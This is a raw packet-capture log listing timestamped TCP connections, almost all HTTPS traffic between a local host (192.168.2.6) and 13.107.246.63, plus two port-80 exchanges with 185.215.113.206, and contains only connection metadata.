Dec 8, 2024 13:31:33.951273918 CET	443	49799	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:34.368655920 CET	443	49799	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:34.368736029 CET	443	49799	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:34.368823051 CET	49799	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:34.376102924 CET	49799	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:34.376102924 CET	49799	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:34.376121998 CET	443	49799	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:34.376131058 CET	443	49799	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:34.392863989 CET	49804	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:34.392903090 CET	443	49804	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:34.393008947 CET	49804	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:34.393429995 CET	49804	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:34.393445015 CET	443	49804	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:34.635514021 CET	443	49801	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:34.640194893 CET	49801	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:34.640224934 CET	443	49801	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:34.640752077 CET	49801	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:34.640757084 CET	443	49801	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.076673031 CET	443	49801	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.076746941 CET	443	49801	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.077334881 CET	49801	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.078052044 CET	443	49803	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.078424931 CET	49801	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.078449011 CET	443	49801	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.078464985 CET	49801	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.078471899 CET	443	49801	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.078500032 CET	443	49802	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.080837965 CET	49803	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.080846071 CET	443	49803	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.081356049 CET	49803	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.081360102 CET	443	49803	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.082580090 CET	49802	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.082606077 CET	443	49802	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.083028078 CET	49802	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.083034992 CET	443	49802	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.086747885 CET	49805	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.086786032 CET	443	49805	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.086877108 CET	49805	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.087069988 CET	49805	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.087089062 CET	443	49805	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.512319088 CET	443	49803	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.512389898 CET	443	49803	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.512603045 CET	49803	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.512638092 CET	49803	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.512638092 CET	49803	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.512658119 CET	443	49803	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.512666941 CET	443	49803	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.513278961 CET	443	49802	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.513331890 CET	443	49802	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.513382912 CET	49802	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.513603926 CET	49802	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.513603926 CET	49802	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.513621092 CET	443	49802	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.513628960 CET	443	49802	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.515664101 CET	49806	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.515696049 CET	443	49806	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.515759945 CET	49806	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.515779018 CET	49807	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.515822887 CET	443	49807	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.515871048 CET	49807	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.515947104 CET	49806	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.515955925 CET	443	49806	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.516084909 CET	49807	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.516098022 CET	443	49807	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.711157084 CET	443	49800	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.712665081 CET	49800	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.712699890 CET	443	49800	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:35.713344097 CET	49800	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:35.713351011 CET	443	49800	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.109128952 CET	443	49804	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.117621899 CET	49804	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.117646933 CET	443	49804	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.125468016 CET	49804	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.125479937 CET	443	49804	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.144450903 CET	443	49800	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.144522905 CET	443	49800	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.144582987 CET	49800	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.144769907 CET	49800	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.144793034 CET	443	49800	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.144804001 CET	49800	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.144809961 CET	443	49800	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.149288893 CET	49808	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.149331093 CET	443	49808	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.149396896 CET	49808	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.149791956 CET	49808	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.149805069 CET	443	49808	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.543179989 CET	443	49804	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.543243885 CET	443	49804	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.543301105 CET	49804	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.543500900 CET	49804	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.543521881 CET	443	49804	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.543531895 CET	49804	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.543538094 CET	443	49804	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.546415091 CET	49809	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.546459913 CET	443	49809	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.546533108 CET	49809	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.546689987 CET	49809	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.546700954 CET	443	49809	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.803189039 CET	443	49805	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.803759098 CET	49805	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.803785086 CET	443	49805	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:36.804191113 CET	49805	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:36.804195881 CET	443	49805	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.232125998 CET	443	49807	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.232692957 CET	49807	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.232729912 CET	443	49807	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.233289003 CET	49807	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.233294964 CET	443	49807	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.234519958 CET	443	49806	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.234839916 CET	49806	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.234858990 CET	443	49806	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.235565901 CET	49806	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.235570908 CET	443	49806	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.239842892 CET	443	49805	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.239905119 CET	443	49805	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.239959955 CET	49805	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.240113020 CET	49805	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.240129948 CET	443	49805	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.240139008 CET	49805	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.240143061 CET	443	49805	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.242724895 CET	49810	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.242767096 CET	443	49810	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.243680000 CET	49810	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.243786097 CET	49810	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.243799925 CET	443	49810	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.665252924 CET	443	49807	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.665323973 CET	443	49807	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.665457964 CET	49807	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.665599108 CET	49807	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.665620089 CET	443	49807	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.665631056 CET	49807	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.665637970 CET	443	49807	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.668025970 CET	443	49806	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.668095112 CET	443	49806	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.668194056 CET	49806	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.668263912 CET	49806	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.668281078 CET	443	49806	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.668291092 CET	49806	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.668297052 CET	443	49806	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.668520927 CET	49811	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.668553114 CET	443	49811	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.668612003 CET	49811	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.668781996 CET	49811	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.668793917 CET	443	49811	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.670696020 CET	49812	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.670725107 CET	443	49812	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.670779943 CET	49812	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.670916080 CET	49812	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.670931101 CET	443	49812	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.869370937 CET	443	49808	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.869894028 CET	49808	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.869925022 CET	443	49808	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:37.870536089 CET	49808	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:37.870541096 CET	443	49808	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.264791965 CET	443	49809	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.265472889 CET	49809	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.265491962 CET	443	49809	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.266000032 CET	49809	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.266004086 CET	443	49809	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.304498911 CET	443	49808	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.304572105 CET	443	49808	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.304651976 CET	49808	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.307730913 CET	49808	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.307751894 CET	443	49808	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.307775974 CET	49808	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.307781935 CET	443	49808	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.310914993 CET	49813	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.310949087 CET	443	49813	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.311033964 CET	49813	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.311222076 CET	49813	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.311239958 CET	443	49813	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.701363087 CET	443	49809	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.701452017 CET	443	49809	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.701577902 CET	49809	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.730597973 CET	49809	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.730628967 CET	443	49809	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.734673023 CET	49814	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.734749079 CET	443	49814	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.734812975 CET	49814	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.736593962 CET	49814	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.736613035 CET	443	49814	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.852267981 CET	80	49791	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:38.855962992 CET	49791	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:38.959963083 CET	443	49810	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.960484982 CET	49810	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.960508108 CET	443	49810	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:38.961312056 CET	49810	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:38.961318016 CET	443	49810	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.397624969 CET	443	49812	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.397686958 CET	443	49811	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.398097038 CET	49812	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.398133993 CET	443	49812	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.398673058 CET	49812	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.398684978 CET	443	49812	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.399080992 CET	49811	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.399111986 CET	443	49811	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.399468899 CET	49811	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.399473906 CET	443	49811	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.403482914 CET	443	49810	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.403559923 CET	443	49810	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.403800011 CET	49810	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.403954029 CET	49810	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.403973103 CET	443	49810	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.403985023 CET	49810	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.403990030 CET	443	49810	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.406754017 CET	49816	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.406801939 CET	443	49816	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.406888008 CET	49816	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.407144070 CET	49816	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.407156944 CET	443	49816	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.832158089 CET	443	49812	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.832212925 CET	443	49812	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.832261086 CET	443	49811	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.832273006 CET	49812	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.832320929 CET	443	49811	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.832355022 CET	49811	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.832494020 CET	49812	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.832494974 CET	49811	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.832504988 CET	443	49811	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.832511902 CET	443	49812	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.832516909 CET	49811	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.832523108 CET	49812	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.832525969 CET	443	49811	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.832528114 CET	443	49812	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.835186958 CET	49817	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.835221052 CET	443	49817	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.835289955 CET	49818	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.835320950 CET	443	49818	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.835323095 CET	49817	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.835412979 CET	49818	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.835458994 CET	49817	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.835469007 CET	443	49817	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:39.835555077 CET	49818	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:39.835566998 CET	443	49818	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.028805971 CET	443	49813	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.029369116 CET	49813	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.029386997 CET	443	49813	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.029870033 CET	49813	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.029877901 CET	443	49813	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.454240084 CET	443	49814	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.454696894 CET	49814	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.454729080 CET	443	49814	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.455168962 CET	49814	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.455174923 CET	443	49814	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.462439060 CET	443	49813	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.462501049 CET	443	49813	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.462726116 CET	49813	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.462765932 CET	49813	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.462786913 CET	443	49813	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.462800980 CET	49813	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.462806940 CET	443	49813	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.465218067 CET	49819	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.465260983 CET	443	49819	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.465420961 CET	49819	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.465553045 CET	49819	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.465565920 CET	443	49819	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.888816118 CET	443	49814	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.888885021 CET	443	49814	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.889028072 CET	49814	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.889214039 CET	49814	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.889233112 CET	443	49814	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.889242887 CET	49814	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.889250994 CET	443	49814	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.892324924 CET	49820	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.892359972 CET	443	49820	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:40.892431974 CET	49820	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.892617941 CET	49820	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:40.892632961 CET	443	49820	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.126193047 CET	443	49816	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.127131939 CET	49816	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.127167940 CET	443	49816	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.127665043 CET	49816	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.127671003 CET	443	49816	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.553332090 CET	443	49818	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.553411961 CET	443	49817	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.553982973 CET	49818	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.554009914 CET	443	49818	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.554681063 CET	49818	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.554686069 CET	443	49818	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.554769993 CET	49817	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.554795980 CET	443	49817	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.555179119 CET	49817	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.555186033 CET	443	49817	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.560584068 CET	443	49816	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.560648918 CET	443	49816	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.560801029 CET	49816	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.560897112 CET	49816	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.560914040 CET	443	49816	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.560923100 CET	49816	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.560929060 CET	443	49816	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.564100027 CET	49822	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.564152002 CET	443	49822	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.564270020 CET	49822	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.564461946 CET	49822	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.564486027 CET	443	49822	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.989495993 CET	443	49817	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.989577055 CET	443	49817	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.989650965 CET	49817	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.989850998 CET	49817	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.989872932 CET	443	49817	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.989885092 CET	49817	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.989891052 CET	443	49817	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.990128040 CET	443	49818	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.990209103 CET	443	49818	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.990264893 CET	49818	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.990431070 CET	49818	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.990453005 CET	443	49818	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.990468025 CET	49818	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.990473032 CET	443	49818	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.993381977 CET	49823	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.993426085 CET	443	49823	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.993599892 CET	49823	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.993715048 CET	49823	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.993729115 CET	443	49823	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.993742943 CET	49824	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.993786097 CET	443	49824	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:41.993850946 CET	49824	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.994039059 CET	49824	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:41.994050026 CET	443	49824	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.183554888 CET	443	49819	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.184077978 CET	49819	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:42.184109926 CET	443	49819	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.184525967 CET	49819	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:42.184533119 CET	443	49819	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.609652996 CET	443	49820	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.610299110 CET	49820	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:42.610315084 CET	443	49820	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.610924006 CET	49820	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:42.610939980 CET	443	49820	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.627006054 CET	443	49819	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.627074957 CET	443	49819	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.627120972 CET	49819	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:42.627268076 CET	49819	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:42.627294064 CET	443	49819	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.627310038 CET	49819	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:42.627321005 CET	443	49819	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.630728960 CET	49825	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:42.630783081 CET	443	49825	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:42.630841017 CET	49825	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:42.631040096 CET	49825	443	192.168.2.6	13.107.246.63
